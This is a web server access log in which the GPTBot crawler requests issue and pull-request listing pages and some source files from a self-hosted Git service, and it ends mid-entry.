[Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:19:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:19:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 14064] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 